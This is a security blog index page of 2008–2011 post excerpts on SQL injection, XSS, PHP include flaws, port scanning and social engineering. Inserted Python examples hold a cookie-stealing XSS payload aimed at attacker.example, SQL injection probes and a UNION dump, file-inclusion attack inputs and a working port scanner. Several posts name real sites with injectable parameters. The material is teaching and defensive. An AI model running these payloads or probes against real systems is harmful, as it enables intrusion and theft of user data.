Found: 16

SQL Injection and PHP

In my opinion, the most common database attack is SQL injection. The attack works by inserting SQL fragments into a request parameter, for example through the URL query string, so that the database server executes them as part of the application's query. Being able to execute SQL statements on the database server can make it possible to take control of the server itself. The material below requires basic knowledge of SQL-92, because it is the main language for accessing the data.

SQL injection is one of the greatest threats for the following reasons:

  • Developers are careless. They do not test their applications for errors; they rely on their skills, but everybody makes mistakes.
  • Many websites are exposed to SQL injection attacks and do not know it.
  • Databases often house significant personal data, such as credit card numbers.
  • Almost every website has a database on the back end and uses SQL queries to access the data.

Date: 2008-02-03
[Read the full version] [Security]


Cross Site Scripting (XSS)

Cross Site Scripting (XSS) is one of the most common application-layer (web browser) hacking techniques. XSS is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is trusted. From the trusted context, an attack can be launched. Attackers can steal users' data, passwords and any other information. Note that although cross site scripting is also sometimes abbreviated "CSS", it has nothing to do with the Cascading Style Sheets technology that is more commonly called CSS.

Attackers try to inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application in order to deceive the user and gather data from them. Everything from account hijacking, cookie theft/poisoning, changing of user settings, or false advertising is possible. New malicious uses are being found every day for XSS attacks. Cross site scripting may look harmless, but it becomes quite critical when the vulnerable web site stores valuable information, such as a session identifier, in cookies.
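The mechanism described above, as an added example that is not code from the original post: a server-side page reflects a search parameter into HTML. The first renderer has the XSS bug; the fixed renderers encode for the context the value lands in. The payloads, the parameter name q and the host attacker.example are constructed for the illustration, and the example is in Python rather than the PHP the post series discusses, but the encoding rules are the same in any server language.

```python
import html
from urllib.parse import urlencode

# Constructed payloads (not from the original post): one aimed at the element
# body context, one at a quoted attribute context.
BODY_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_search_vulnerable(q: str) -> str:
    """Reflects the search term straight into the page: the XSS bug."""
    return "<p>Results for: " + q + "</p>"


def render_search_fixed(q: str) -> str:
    """HTML-encodes the term, so the browser shows the payload as text
    instead of parsing it as markup."""
    return "<p>Results for: " + html.escape(q) + "</p>"


def render_input_vulnerable(q: str) -> str:
    """Same bug inside an attribute: a stray quote closes value="..." early
    and the rest of the payload becomes new attributes."""
    return '<input name="q" value="' + q + '">'


def render_input_fixed(q: str) -> str:
    """quote=True turns " and ' into entities as well, so the attribute stays shut."""
    return '<input name="q" value="' + html.escape(q, quote=True) + '">'


def render_link_fixed(q: str) -> str:
    """URL context: percent-encode the value first, then HTML-encode the
    result because it sits inside an attribute."""
    return '<a href="/search?' + html.escape(urlencode({"q": q}), quote=True) + '">search again</a>'


if __name__ == "__main__":
    print(render_search_vulnerable(BODY_PAYLOAD))
    print(render_search_fixed(BODY_PAYLOAD))
    print(render_input_vulnerable(ATTR_PAYLOAD))
    print(render_input_fixed(ATTR_PAYLOAD))
    print(render_link_fixed(BODY_PAYLOAD))
```

Encoding has to match the context: body text needs `<` and `&` handled, attributes also need the quote characters, and a value placed into a URL needs percent-encoding before HTML-encoding. Marking the session cookie HttpOnly limits what the body payload above can read, but it does not remove the injection.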

Date: 2008-01-23
[Read the full version] [Security]


SQL Injection on www.newspaperads.com

Today we shall consider the popular SQL injection mistake using the site www.newspaperads.com as an example. It interested me for the following reasons:

  • It is large;
  • The site belongs to the well-known USA Today;
  • The site uses ASP with MS SQL Server.

Date: 2008-01-15
[Read the full version] [Security]


PHP Include error

Never include, require, or otherwise open a file whose filename is based on user input without thoroughly validating it first.

Take the following example:

// $param comes straight from the request (with register_globals on,
// ?param=... populates it) and is never validated before being included
if(isset($param))
{
  include($param);   // the attacker controls the path: local or remote file inclusion
}
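Two ways to check the parameter before it reaches the include, as an added example that is not code from the original post. The directory /var/www/app/pages, the page names and the test inputs are constructed for the illustration, and the checks are written in Python rather than PHP; the same two rules (map the parameter onto a fixed set of files, or confine a normalised path to one directory and refuse stream wrappers and NUL bytes) apply directly to PHP's include().

```python
import os

# Constructed layout (not from the original post): includable page fragments
# live under one directory, and only these names are meant to be included.
BASE_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_include_allowlist(param: str):
    """Strict fix: the parameter selects from a fixed set of known files and
    is never used as a path itself. Returns the path to include, or None."""
    if param not in ALLOWED_PAGES:
        return None
    return os.path.join(BASE_DIR, param + ".php")


def resolve_include_confined(param: str, base: str = BASE_DIR):
    """Weaker fix for when an allowlist is impractical: refuse NUL bytes,
    stream wrappers / remote URLs, and anything that normalises to a location
    outside base. Always include the returned absolute path, never the raw
    parameter, so that wrapper prefixes can never reach include()."""
    if not param or "\0" in param:
        return None                 # truncation tricks such as "x.php\0.jpg"
    if "://" in param or param.startswith("//"):
        return None                 # http://, ftp://, php://filter, data://
    candidate = os.path.realpath(os.path.join(base, param))
    if not candidate.startswith(base + os.sep):
        return None                 # ../ climbed out, or an absolute path replaced base
    return candidate


if __name__ == "__main__":
    # Constructed inputs: one legitimate page and the usual inclusion attacks.
    for p in ("home", "home.php", "../../../etc/passwd", "/etc/passwd",
              "http://attacker.example/shell.txt",
              "php://filter/read=convert.base64-encode/resource=index",
              "x.php\0.jpg"):
        print(repr(p), "->", resolve_include_allowlist(p), "|", resolve_include_confined(p))
```

The allowlist is the version to prefer: it removes the path decision from the attacker entirely. The confined version only holds if the base directory contains nothing an attacker can upload or write to.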

Date: 2008-02-25
[Read the full version] [Security]


SQL Injection on www.compostingcouncil.org

Today we shall consider a web site that contains an SQL injection error: http://www.compostingcouncil.org. The programmer of the site does not know about security, and the majority of the web page parameters are vulnerable. We shall consider the following URL:

http://www.compostingcouncil.org/section.cfm

The section.cfm file receives the parameter id. If you add a single quote to the end of the parameter value, there will be an execution error. We shall consider the error text in more detail:

Date: 2008-03-05
[Read the full version] [Security]


Critical SQL Injection (http://cshe.berkeley.edu/)

Today we shall consider the SQL injection error on the site http://cshe.berkeley.edu/. There is a mistake in the parameter s of the script http://cshe.berkeley.edu/publications/publications.php. If you append " and 1=1 " to the parameter, the script inserts it into the SQL query unchanged. That means the mistake exists and we can exploit it.

Let's try to find out the number of fields returned by the query. In my case it turned out to be four fields. The following request was executed correctly.
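The three SQL injection posts above (the PHP introduction, the single-quote error on section.cfm, and the " and 1=1 " probe and field count on publications.php) all describe the same technique, so here is one added example covering it; it is not code from the original posts. It is written in Python against an in-memory SQLite database, with a constructed publications table of four columns and a users table, and a vulnerable query built by string pasting the way the posts describe. The probes are run against both the vulnerable query and its parameterised replacement.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and data (not from the original posts): four
    columns, the count the Berkeley post arrives at, plus a table worth stealing."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE publications("
                "id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER)")
    con.executemany("INSERT INTO publications(title, author, year) VALUES (?, ?, ?)",
                    [("Access and Equity", "Douglass", 2005),
                     ("Tuition Trends", "Johnson", 2006),
                     ("Faculty Careers", "Mason", 2007),
                     ("Research Universities", "Geiger", 2007)])
    con.execute("CREATE TABLE users(login TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def search_vulnerable(con, s: str):
    """The bug: the request parameter is pasted into the statement text, the
    equivalent of mysql_query("... WHERE id = $s") in PHP."""
    sql = "SELECT id, title, author, year FROM publications WHERE id = %s" % s
    return con.execute(sql).fetchall()


def search_safe(con, s: str):
    """The fix: a bound parameter travels as a value and is never parsed as SQL."""
    sql = "SELECT id, title, author, year FROM publications WHERE id = ?"
    return con.execute(sql, (s,)).fetchall()


def looks_injectable(search, con, value: str = "3") -> bool:
    """The two probes from the posts: a stray quote that breaks the statement
    (the execution error on section.cfm), and the 1=1 / 1=2 pair whose
    results differ only if the text reached the query (publications.php)."""
    quote_error = False
    try:
        search(con, value + "'")
    except sqlite3.Error:          # the database error page the posts describe
        quote_error = True
    differ = search(con, value + " and 1=1") != search(con, value + " and 1=2")
    return quote_error or differ


def count_columns(search, con, value: str = "3", limit: int = 20):
    """ORDER BY n fails once n exceeds the number of selected columns, so the
    last n that works is the column count. None means no probe errored, i.e.
    the parameter never reached the query."""
    for n in range(1, limit + 1):
        try:
            search(con, "%s order by %d" % (value, n))
        except sqlite3.Error:
            return n - 1 if n > 1 else None
    return None


def dump_users(con):
    """With the column count known, a UNION with matching width pulls another
    table into the result set of the vulnerable query."""
    return search_vulnerable(con, "-1 union select 1, login, password, 4 from users")


if __name__ == "__main__":
    con = make_db()
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(name, "injectable:", looks_injectable(fn, con),
              "columns:", count_columns(fn, con))
    print("union dump:", dump_users(con))
```

With the parameterised query every probe returns an empty result and no error, which is why a parameter-binding API (PDO or mysqli prepared statements in PHP, cfqueryparam in ColdFusion) is the fix, not escaping the quote by hand. The error message itself is the second half of the problem: a production site should log it and show the user a generic page.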

Date: 2008-03-17
[Read the full version] [Security]


All our security problems will go away

Today I read an article and was struck by the following phrase:

"Let's just train everyone, and all our security problems will go away." If only it were so easy.

Training and education can't solve all security problems, but proper education can eliminate the foolish ones. Most errors appear in code when developers write it without attention or without deep knowledge. Education can prevent most of those errors, and our software will be more secure and reliable. But education and training can't solve all security problems.

Date: 2008-06-11
[Read the full version] [Security]


Port Scanner and CyD Network Utilities Security

CyD Software Labs published a new document that describes how to use the Port Scanner module of the CyD Network Utilities Security tools software product.

Port Scanner is an advanced network utility for finding ports that are open on any machine or range of machines on a network. CyD Port Scanner can scan any class A, B or C network for any list of ports. Finding an open port on a host can mean one of many things. An open port can be a server service such as FTP or HTTP that a user on the node may or may not be allowed to run under the network's administration rules.
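What such a scanner does underneath, as an added example in Python that is not CyD's code: a TCP connect scan of a list of ports across the hosts of a CIDR block, run concurrently. The local demonstration opens one listening socket on loopback so the example can be run offline; the 192.0.2.0/24 block in the usage comment is a documentation range, not a real target.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """TCP connect scan: a completed three-way handshake means something is
    listening. Refused, timed out and unreachable all count as not open."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:            # ECONNREFUSED, timeout, EHOSTUNREACH, ...
            return False


def expand_network(cidr: str):
    """Turn a CIDR block (for instance a class C /24) into its host addresses."""
    return [str(ip) for ip in ipaddress.ip_network(cidr, strict=False).hosts()]


def scan(hosts, ports, timeout: float = 0.5, workers: int = 64):
    """Probe every (host, port) pair concurrently; return the open pairs, sorted."""
    targets = [(h, p) for h in hosts for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda t: is_open(t[0], t[1], timeout), targets))
    return sorted(t for t, open_ in zip(targets, flags) if open_)


def find_closed_port(candidates=range(20000, 20100)) -> int:
    """Pick a loopback port nothing listens on: if bind() succeeds the port is
    free, and it is then released again. Chosen below the ephemeral range so a
    later connect() cannot accidentally pair with its own source port."""
    for port in candidates:
        try:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.bind(("127.0.0.1", port))
            return port
        except OSError:
            continue
    raise RuntimeError("no free port in candidate range")


def demo_local_scan():
    """Offline demonstration: one constructed listener on loopback and one port
    known to be closed. Returns (open_port, closed_port, scan result)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    closed_port = find_closed_port()
    try:
        found = scan(["127.0.0.1"], [open_port, closed_port], timeout=1.0)
    finally:
        listener.close()
    return open_port, closed_port, found


if __name__ == "__main__":
    o, c, found = demo_local_scan()
    print("listening on", o, "| closed", c, "| scanner found", found)
    # Against a network you are authorised to test, for example:
    # print(scan(expand_network("192.0.2.0/24"), [21, 22, 25, 80, 443]))
```

A connect scan completes the handshake, so it shows up in the target's service logs and needs no privileges; a SYN scan needs raw sockets and is quieter. Keep the timeout short and the worker count moderate when scanning a whole /24, or the scan itself becomes the noisiest thing on the segment.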

Date: 2008-12-11
[Read the full version] [Security]


Social Engineering

Social engineering is a hacker's most powerful weapon. It has been used to pull off the most sensational break-ins and to spread the most notorious viruses. Recall the Anna Kurnikova virus, which spread when users received a letter in their mailbox with an attachment purporting to be a picture of Anna wearing nothing at all. This application of social engineering took advantage of human weakness. I believe that the virus spread thanks to the excessive curiosity of the male share of Internet users, the larger one, who opened the attachment and infected their computers.

Hackers are exceptionally good at finding weak spots in people and pressing on them to acquire the information they need. One area in which social engineering is used is obtaining credit card numbers and other information with the help of believable email messages. Users receive a letter asking them for their account password because, for example, the bank's database has malfunctioned. What do you think: although they have been explicitly warned by the bank's staff never to reveal a password to anyone, quite a few users do.

Date: 2009-01-09
[Read the full version] [Security]


Computer Viruses in email attachments

It is a very good idea never to trust the e-mail messages you receive. Never open an e-mail attachment unless you are 100% sure it is safe! Even if your friend's address is in the From field, there is no guarantee that the message is actually from your friend. Even if it is, this does not mean that it is safe to open the attachment: your friend's computer may be infected by a virus that sends messages bearing his or her name to everyone in the address book, meaning that you might become a victim.

Virus writers understand social engineering very well and go to great lengths to make their messages intriguing enough to get you to open the attachment. I often receive messages with attachments that are seemingly from my friends or partners, with subjects like "Urgently check this proposal!", but I never open them until I have made sure they are safe.

Date: 2011-10-29
[Read the full version] [Security]







Copyright © Flenov.net 2013. All rights reserved
www.flenov.net